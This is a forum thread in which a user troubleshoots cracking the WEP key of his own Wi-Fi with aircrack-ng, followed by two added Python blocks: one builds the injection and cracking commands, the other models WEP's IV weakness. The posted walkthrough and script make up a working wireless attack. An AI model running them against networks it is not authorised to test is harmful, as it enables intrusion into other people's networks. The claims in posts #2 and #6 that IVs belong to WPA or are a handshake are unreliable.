
#1 2011-10-17 10:02:09

Prowler
Member
Registered: 2011-05-16
Posts: 16

[SOLVED] Unable to crack my own WEP network

For a long time I've been trying to do this (crack my own 64-bit WEP Wi-Fi) but have given up because of various problems. For example, I have the "Fixed channel -1" problem when aireplay-ing. But yesterday I decided that I could ignore that and just use airodump + aircrack + wget-ing a file.
So the commands I issued before I went to bed were:

airodump-ng --bssid <MACofAP> --channel 8 -w /tmp/overNight mon0    # on a root terminal
while true; do wget <file> -O /dev/null; done
sleep 2h; aircrack-ng /tmp/overNight-01.cap                           # on a root terminal
sleep 4h; aircrack-ng -K /tmp/overNight-01.cap                        # on a root terminal

And so in the morning I found the PTW method failing with a segmentation fault.
The KoreK one was just continuing to test keys... The night before, I tried to eliminate each method alone using "aircrack -K /tmp/overNight-01.cap -k 1..17" with no success either. Worth noting is that I'm using the "rtl8192se" driver.

> lspci | grep -i wireless
03:00.0 Network controller: Realtek Semiconductor Co., Ltd. RTL8191SEvB Wireless LAN Controller (rev 10)

Today I tried BackTrack 5. I needed to download and compile the same driver manually; all the other related ones failed to work. I had a segmentation fault again with PTW and got no success with aireplay-ng, other than that when I issued the -1 0 attack I saw a lot of different MACs in airodump. No "Channel -1" as far as I saw, but still, even the -9 test fails 0/30.

But really, the strangest thing is how I can't crack the pass with over 1.5 million IVs! No idea how to proceed now; it would be awesome if someone has one :)

Last edited by Prowler (2011-10-17 17:59:56)


#2 2011-10-17 14:07:08

lifeafter2am
Member
From: 127.0.0.1
Registered: 2009-06-10
Posts: 1,332

Re: [SOLVED] Unable to crack my own WEP network

You don't use IVs to crack WEP, you use IVs to crack WPA (which is a whole other beast). You need to collect entire packets for WEP. If you use Kismet or something similar, they are referred to as "crypted packets".

You literally only need to do three things (if you're not actively injecting):

1) airmon-ng to put the card into promiscuous mode (if you can't do this, it will fail)
2) airodump-ng to capture the packets
3) aircrack-ng to crack the key

If there isn't any active traffic on the network (i.e. you're not collecting enough crypted packets) then you have to either inject, or wait longer.

Also, no need for all the sleep commands and such. Aircrack is smart: it waits for enough packets and then tries, then waits, then tries, etc. I also have no clue where your wget command comes from.

Lastly, are you using the patched compat-wireless drivers? If you are not, promiscuous mode will not work correctly on Arch for the rtl chipsets.


#binarii @ irc.binarii.net
Matrix Server: https://matrix.binarii.net
-------------
Allan -> ArchBang is not supported because it is stupid.


#3 2011-10-17 15:52:26

Prowler
Member
Registered: 2011-05-16
Posts: 16

Re: [SOLVED] Unable to crack my own WEP network

Thank you for clarifying the IV term. As you can see, I've collected whole packets (no --ivs option) on mon0 (which I brought up using airmon start wlan0). So
1: ran airmon start wlan0, got

wlan0    Unknown    rtl8192se - [phy0]
                    (monitor mode enabled on mon0)

2: airodumped on the right channel with the right BSSID, saving to a file
3: used aircrack-ng with both methods

And that wget is because I'm already connected to the Wi-Fi I'm trying to crack (I believe that is not a problem; I have tried without being connected, as far as I remember) and because injecting fails, I'm generating traffic with that wget script :) The sleep is because I left it for the whole night, so I wanted to make sure I gave everything enough time and that the two aircracks didn't interfere with each other.

About compat-wireless, I will install these now, but I haven't done so because I don't see how not having them would prevent me from airodumping and aircracking properly. Maybe I am mistaken and these do not impact injection only. Anyway, I'll try again with them.


#4 2011-10-17 16:34:38

lifeafter2am
Member
From: 127.0.0.1
Registered: 2009-06-10
Posts: 1,332

Re: [SOLVED] Unable to crack my own WEP network

Prowler wrote:

> Thank you for clarifying the IV term. As you can see, I've collected whole packets (no --ivs option) on mon0 (which I brought up using airmon start wlan0). So
> 1: ran airmon start wlan0, got
>
>  wlan0    Unknown    rtl8192se - [phy0]
>                      (monitor mode enabled on mon0)
>
> 2: airodumped on the right channel with the right BSSID, saving to a file
> 3: used aircrack-ng with both methods
>
> And that wget is because I'm already connected to the Wi-Fi I'm trying to crack (I believe that is not a problem; I have tried without being connected, as far as I remember) and because injecting fails, I'm generating traffic with that wget script :) The sleep is because I left it for the whole night, so I wanted to make sure I gave everything enough time and that the two aircracks didn't interfere with each other.
>
> About compat-wireless, I will install these now, but I haven't done so because I don't see how not having them would prevent me from airodumping and aircracking properly. Maybe I am mistaken and these do not impact injection only. Anyway, I'll try again with them.

They do impact a few things, including some errors that can happen while using the rtl mon0 interface. Also, AFAIK you cannot be connected to a wireless network and at the same time have the card running in promiscuous mode. Unless you have a dual-mode card, it can't be in infrastructure mode and promiscuous mode at the same time.

I would do this:
1) Install compat-wireless drivers
2) Reboot (so the new drivers are used)
3) Disconnect from the network
4) Use an injection technique

Follow the instructions from this page:
http://www.aircrack-ng.org/doku.php?id= … no_clients

With an injection technique it should only take an hour, MAYBE two, but no longer than that. Most WEP I can crack in about 15 min (30 with my slower netbook).




#5 2011-10-17 17:55:17

Prowler
Member
Registered: 2011-05-16
Posts: 16

Re: [SOLVED] Unable to crack my own WEP network

Did it! There was one slight thing I missed that caused me to trip on Step 3 of the tutorial: the Wi-Fi card has a MAC address too. I always entered the eth0 MAC address on -h... The thing that got me running was a post where I read "wireless MAC address". :)

Cracking WEP more quickly:
airodump-ng mon0
airodump-ng -w wep -c [channel] --bssid [bssid number] mon0

Open a new console:
aireplay-ng -1 6000 -a [bssid] -e [router name] -h [my wireless mac] -o 1 -q 10 mon0

Open a new console:
aireplay-ng -2 -b [bssid] -h [my wireless mac] -c FF:FF:FF:FF:FF:FF -p 0841 mon0

Crack:
Open a new console (4 terminals open now). Data needs to hit about 30,000 in the first terminal window.
Type dir (to find the capture file name)
aircrack-ng [filename].cap

After following the steps provided, I cracked the easy pass of my WEP network in ~2 minutes with about 40k data. Thank you for helping me; these compat-wireless drivers really proved to matter. I still don't understand why I can't passively capture and crack without them, but I'll have to accept that it needs them. Awesome, for a long time this has been my goal ^^ Thank you again ;)

PS:
> Read 81233 packets.
>
>    #  BSSID              ESSID                     Encryption
>
>    1  54:E6:FC:B1:62:B8  WEPJungle                 WEP (268 IVs)
>    2  74:EA:3A:C5:F4:9E  TP-LINK_C5F49E            No data - WEP or WPA
>    3  00:0E:2E:60:E0:91  Rosito                    WPA (0 handshake)
Are you sure IVs aren't for WEP? This output came from aircrack, asking me which network when I hadn't specified one...

PS2: Gotta add one thing: doing "/etc/rc.d/networkmanager stop" is mandatory, otherwise aireplay won't inject. Also, the "-o 1 -q 10" options of the second step seem to do nothing; it works fine without them. On the other hand, "-p 0841" on the third step is a must; it doesn't inject any data without it. It seems to work with only that value as far as I can see, which is very strange because it's hardly mentioned anywhere in guides.

PS3: Updated the guide I followed for better usage: http://pastebin.com/0nPabSJC
PS4: With "aireplay -3" it's even easier, even intuitive. The man page says it's more reliable, but it seems to me it's a bit slower in the data injecting process. But I guess the benefit is that you never use your IP (I know I can change it for the other method too). At least it's so easy: just turn it on and wait for someone to use the net. Saves one terminal :D
PS5: After checking again, it turns out that sometimes I can't aireplay -1 without "-o 1 -q 10".

Last edited by Prowler (2011-10-19 10:00:41)

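Added example, not from any post in this thread: the walkthrough above assembled as argv lists, with the -h value read from the monitor interface's own sysfs entry instead of typed by hand (pasting the eth0 MAC was the mistake the post describes). The BSSID and ESSID are the ones from the aircrack output quoted above and the channel is the one from the first post; the sysfs tree in demo() is constructed so the script runs without a wireless card, and the option set is taken verbatim from the post, not from the aircrack-ng project.

```python
"""Build the airodump/aireplay/aircrack commands of the walkthrough, taking
the -h MAC from /sys/class/net/<mon>/address rather than from the user."""
import os
import re
import tempfile

MAC_RE = re.compile(r"^[0-9a-f]{2}(:[0-9a-f]{2}){5}$")


def iface_mac(iface: str, sysfs: str = "/sys/class/net") -> str:
    """Hardware address of `iface` (e.g. mon0) as Linux exposes it in sysfs."""
    with open(os.path.join(sysfs, iface, "address")) as f:
        mac = f.read().strip().lower()
    if not MAC_RE.match(mac) or mac == "00:00:00:00:00:00":
        raise ValueError(f"{iface}: no usable MAC address ({mac!r})")
    return mac


def wep_commands(mon: str, bssid: str, essid: str, channel: int,
                 sysfs: str = "/sys/class/net", prefix: str = "wep") -> dict:
    """One argv list per terminal of the walkthrough; -h is always iface_mac(mon),
    so the eth0 address can never end up in the fake-auth or replay command."""
    mac = iface_mac(mon, sysfs)
    return {
        "capture":  ["airodump-ng", "-w", prefix, "-c", str(channel),
                     "--bssid", bssid, mon],
        "fakeauth": ["aireplay-ng", "-1", "6000", "-o", "1", "-q", "10",
                     "-a", bssid, "-e", essid, "-h", mac, mon],
        "replay":   ["aireplay-ng", "-2", "-b", bssid, "-h", mac,
                     "-c", "FF:FF:FF:FF:FF:FF", "-p", "0841", mon],
        "crack":    ["aircrack-ng", f"{prefix}-01.cap"],
    }


def demo() -> dict:
    """Constructed sysfs tree: a wired eth0 and a monitor interface mon0 with
    different MACs, so the result shows which one ends up behind -h."""
    root = tempfile.mkdtemp()
    for iface, mac in (("eth0", "00:11:22:33:44:55"), ("mon0", "66:77:88:99:aa:bb")):
        os.makedirs(os.path.join(root, iface))
        with open(os.path.join(root, iface, "address"), "w") as f:
            f.write(mac + "\n")
    return wep_commands("mon0", "54:E6:FC:B1:62:B8", "WEPJungle", 8, sysfs=root)


if __name__ == "__main__":
    import shlex
    for name, argv in demo().items():
        print(f"# {name}\n{shlex.join(argv)}")
```

Drop the `sysfs=root` argument to read the real interface; the commands are only printed here, so run them in their own terminals as the walkthrough says.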

#6 2011-10-17 19:58:01

lifeafter2am
Member
From: 127.0.0.1
Registered: 2009-06-10
Posts: 1,332

Re: [SOLVED] Unable to crack my own WEP network

aircrack wrote:

> As a reminder, the requirement is that you capture the full packet with airodump-ng. Meaning, do not use the "--ivs" option.

IVs are a handshake; you don't want just those for WEP. The weakness of WEP has to do with the header of the full packet; it has nothing to do with the handshake.




#7 2011-10-17 22:00:59

Prowler
Member
Registered: 2011-05-16
Posts: 16

Re: [SOLVED] Unable to crack my own WEP network

lifeafter2am wrote:

> aircrack wrote:
>
> > As a reminder, the requirement is that you capture the full packet with airodump-ng. Meaning, do not use the "--ivs" option.
>
> IVs are a handshake; you don't want just those for WEP. The weakness of WEP has to do with the header of the full packet; it has nothing to do with the handshake.

Okay, then I will take it that in this context IV is used to indicate how many full packets there are. Strange, but probably true ^^

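Added example, not from any post in this thread, on the "IV" question that runs through posts #2, #5, #6 and #7: a WEP data frame carries a 3-byte initialisation vector in the clear and RC4 is keyed with IV || secret key, so the "N IVs" figure aircrack-ng prints is the number of distinct IVs read off captured WEP data frames (the PTW attack additionally wants the whole frame, which is why --ivs must stay off). The code is a from-scratch model of the WEP frame body, not aircrack-ng's; the key, IVs and payloads are constructed, and capture() deliberately cycles through a small IV set to show the count plateauing no matter how many frames are collected.

```python
"""Model of the WEP frame body: IV(3) | keyid<<6 (1) | RC4(IV||key, plaintext||ICV).
Shows what an IV is, how it is counted, and what a repeated IV leaks."""
import struct
import zlib
from typing import Iterable, Optional

KEY = bytes.fromhex("1f2e3d4c5b")   # constructed 40-bit key ("64-bit WEP")


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key schedule, then keystream XOR), the cipher WEP uses."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Encrypt one frame body; the IV travels in the clear in front of the ciphertext."""
    if len(iv) != 3 or len(key) not in (5, 13) or not 0 <= key_id <= 3:
        raise ValueError("IV is 3 bytes, key 5 or 13 bytes, key_id 0..3")
    return iv + bytes([key_id << 6]) + rc4(iv + key, plaintext + icv(plaintext))


def wep_parse(body: bytes):
    """(iv, key_id, ciphertext||ICV): readable without the key, which is all
    airodump-ng needs to count IVs on every captured data frame."""
    return body[:3], body[3] >> 6, body[4:]


def wep_decrypt(key: bytes, body: bytes) -> bytes:
    """Decrypt and check the ICV; ValueError on a wrong key or corrupted frame."""
    iv, _key_id, ct = wep_parse(body)
    pt_icv = rc4(iv + key, ct)
    pt, tag = pt_icv[:-4], pt_icv[-4:]
    if tag != icv(pt):
        raise ValueError("ICV mismatch: wrong key or corrupted frame")
    return pt


def unique_ivs(bodies: Iterable[bytes]) -> int:
    """The 'N IVs' figure: distinct IVs among the full data frames captured."""
    return len({wep_parse(b)[0] for b in bodies})


def reused_iv_leak(body_a: bytes, body_b: bytes) -> Optional[bytes]:
    """Two frames under one key with the same IV share an RC4 keystream, so
    ct_a XOR ct_b == pt_a XOR pt_b.  Returns that XOR, or None if the IVs differ."""
    iv_a, _, ct_a = wep_parse(body_a)
    iv_b, _, ct_b = wep_parse(body_b)
    if iv_a != iv_b:
        return None
    return bytes(x ^ y for x, y in zip(ct_a, ct_b))


def capture(n_frames: int, iv_space: int) -> list:
    """Constructed capture: the sender cycles through only `iv_space` IVs, so
    unique_ivs() stops growing however many frames are collected."""
    return [wep_encrypt(KEY, (i % iv_space).to_bytes(3, "big"),
                        b"GET /file HTTP/1.0\r\n" + i.to_bytes(4, "big"))
            for i in range(n_frames)]


if __name__ == "__main__":
    frames = capture(1000, 250)
    print(len(frames), "frames,", unique_ivs(frames), "unique IVs")
    leak = reused_iv_leak(frames[0], frames[250])   # same IV, different payload
    print("ciphertext XOR with a reused IV:", leak[:24].hex())
    print(wep_decrypt(KEY, frames[0]))
```

The leak shown for a reused IV is the classic keystream-reuse problem; the KoreK and PTW statistics that aircrack-ng runs are separate, stronger attacks on the same IV-prefixed RC4 key, which is why the tool keeps the IV count in front of you while it works.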
